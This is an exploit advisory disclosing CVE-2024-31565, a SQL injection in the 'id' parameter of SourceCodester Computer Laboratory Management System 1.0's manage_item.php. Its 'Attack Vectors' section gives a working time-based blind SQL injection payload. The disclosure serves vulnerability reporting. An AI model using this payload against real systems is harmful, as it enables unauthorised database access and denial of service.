# Exploit Title: SourceCodester Computer Laboratory Management System 1.0 (manage_item.php) - SQL Injection # Date: 1 April 2024 # Exploit Author: Gnanaraj Mauviel (@0xm3m) # Vendor Homepage: https://www.sourcecodester.com/php/17268/computer-laboratory-management-system-using-php-and-mysql.html # Version: v1.0 # CVE: CVE-2024-31565 # Tested on: Mac OSX, XAMPP, Apache, MySQL ------------------------------------------------------------------------------------------------------------------------------------------- [Suggested description] Sourcecodester Computer Laboratory Management System 1.0 is vulnerable to SQL Injection via the 'id' parameter in /admin/item/manage_item.php?id=1'. ------------------------------------------ [Vulnerability Type] SQL Injection ------------------------------------------ [Vendor of Product] SourceCodester ------------------------------------------ [Affected Product Code Base] SourceCodester Computer Laboratory Management System - 1.0 ------------------------------------------ [Affected Component] The functionality allowing users to manage the items information within the application. ------------------------------------------ [Attack Type] Local ------------------------------------------ [Impact Code execution] true ------------------------------------------ [Impact Denial of Service] true ------------------------------------------ [Impact Information Disclosure] true ------------------------------------------ [Attack Vectors] To exploit this vulnerability, the following payload can be used to retrieve the data from the database id=1' AND (SELECT 6230 FROM (SELECT(SLEEP(5)))AYlp) AND 'raoS'='raoS on 'id' parameter on 'http://localhost/php-lms/admin/item/manage_item.php?id=1' ------------------------------------------ [Reference] https://www.strongboxit.com/ [Discoverer] Gnanaraj Mauviel with StrongBox IT Private Limited